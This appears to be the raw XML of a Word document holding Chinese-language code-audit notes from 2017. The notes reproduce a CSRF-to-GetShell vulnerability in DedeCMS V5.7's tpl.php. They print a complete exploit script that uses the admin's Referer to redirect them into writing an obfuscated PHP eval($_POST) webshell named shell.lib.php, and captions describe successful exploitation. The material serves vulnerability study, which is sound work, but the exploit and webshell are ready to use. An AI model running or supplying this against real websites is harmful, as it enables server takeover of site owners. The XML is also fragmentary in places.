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2017年7月17日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="3780" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:jc w:val="right"/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-----代码审计笔记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Dedecms V5.7 友情链接GetShell复现以及详细审计报告:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C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70C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Csrf不多说 来直接看漏洞页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind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  <w:t>tpl.php分析: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//仅给出部分关键代码 漏洞在此文件结尾 行245-258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else if($action=='savetagfile'){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if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)){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    ShowMsg('文件名不合法，不允许进行操作！', '-1');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    exit();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}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//上面If语句 用正则判断文件名是否正确</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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require_once(DEDEINC.'/oxwindow.class.php');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$tagname = preg_replace("#\.lib\.php$#i", "", $filename);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$content = stripslashes($content);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$truefile = DEDEINC.'/taglib/'.$filename;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFC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FFC000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$fp = fopen($truefile, 'w');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFC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C000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    fwrite($fp, $content);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFC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C000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    fclose($fp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="1400" w:firstLineChars="50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//这里可以看到是一个明显的文件操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind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  <w:t>GetShell.php分析:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind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//这个文件是大佬写的Exp</w:t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&lt;?php</w:t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$referer = $_SERVER['HTTP_REFERER'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="7030A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//判断跳转之前的地址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 xml:space="preserve">$dede_login = </w:t>
      </w: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str_replace("friendlink_main.php","",$referer);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color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//去掉friendlink_main.php，取得dede后台的路径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这个不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>多说</w:t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 xml:space="preserve">$muma = </w:t>
      </w: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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:'&lt;'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'/''.'c'.'/''.']'.')'.';'.'?'.'&gt;';" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'&lt;'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.</w:t>
      </w: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'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'&gt;';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">//拼接 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p可自定义密码</w:t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 xml:space="preserve">$exp = </w:t>
      </w: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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tpl.php?action=savetagfile&amp;actiondo=addnewtag&amp;conte</w:t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color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nt='. $muma .'&amp;filename=shell.lib.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>';</w:t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$url = $dede_login.$exp;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color w:val="7030A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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拼接地址</w:t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header("location: ".$url);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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>跳转</w:t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exit();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val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color w:val="7030A0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?&gt;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喜闻乐见的验证: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7325" cy="3636645"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="1" name="图片 1" descr="TIM图片2017071721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707172141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  <w:t>进后台看一下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5258435" cy="3814445"/>
            <wp:effectExtent l="0" t="0" r="18415" b="14605"/>
            <wp:docPr id="2" name="图片 2" descr="TIM图片2017071721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图片201707172142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  <w:t>抓包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3996690"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3810"/>
            <wp:docPr id="3" name="图片 3" descr="TIM图片20170717214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707172147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  <w:t>果然生成了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73040" cy="2639060"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="4" name="图片 4" descr="TIM图片2017071721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707172147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  <w:t>成功利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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2F5B"/>
    <w:rsid w:val="080626A9"/>
    <w:rsid w:val="1D276597"/>
    <w:rsid w:val="1D9559EE"/>
    <w:rsid w:val="4BCF335B"/>
    <w:rsid w:val="5352296A"/>
    <w:rsid w:val="5F0455B4"/>
    <w:rsid w:val="7B1761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2017-07-17T13:56:03Z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